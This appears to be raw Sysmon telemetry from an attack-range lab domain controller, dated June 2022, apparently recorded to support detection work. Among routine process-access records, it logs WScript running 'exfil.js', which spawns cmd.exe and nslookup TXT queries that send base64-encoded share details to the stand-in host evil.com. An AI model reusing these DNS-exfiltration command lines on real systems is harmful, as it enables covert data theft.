14:21:44.574{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-7145-000000005F02}2256C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.574{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-7145-000000005F02}2256C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.558{2E1864BB-18F8-629A-7145-000000005F02}22562848C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-7045-000000005F02}7184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.558{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7145-000000005F02}2256C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.543{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-7045-000000005F02}7184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.543{2E1864BB-18E0-629A-6742-000000005F02}39767692C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-7045-000000005F02}7184C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.554{2E1864BB-18F8-629A-7045-000000005F02}7184C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsmhb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.543{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyodyq.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.512{2E1864BB-18F8-629A-6E45-000000005F02}59606436C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6F45-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.512{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6F45-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.512{2E1864BB-18F8-629A-6D45-000000005F02}58287944C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-6F45-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.521{2E1864BB-18F8-629A-6F45-000000005F02}4284C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-6D45-000000005F02}5828C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyodyq.tmp 2>&1 10341000x8000000000000000213364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.496{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-6E45-000000005F02}5960C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.496{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-6E45-000000005F02}5960C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.496{2E1864BB-18F8-629A-6E45-000000005F02}59606436C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6D45-000000005F02}5828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.472{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6E45-000000005F02}5960C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.457{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6D45-000000005F02}5828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.457{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.457{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.457{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.457{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.457{2E1864BB-18E0-629A-6742-000000005F02}39762132C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-6D45-000000005F02}5828C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.466{2E1864BB-18F8-629A-6D45-000000005F02}5828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyodyq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.457{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluoqz.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 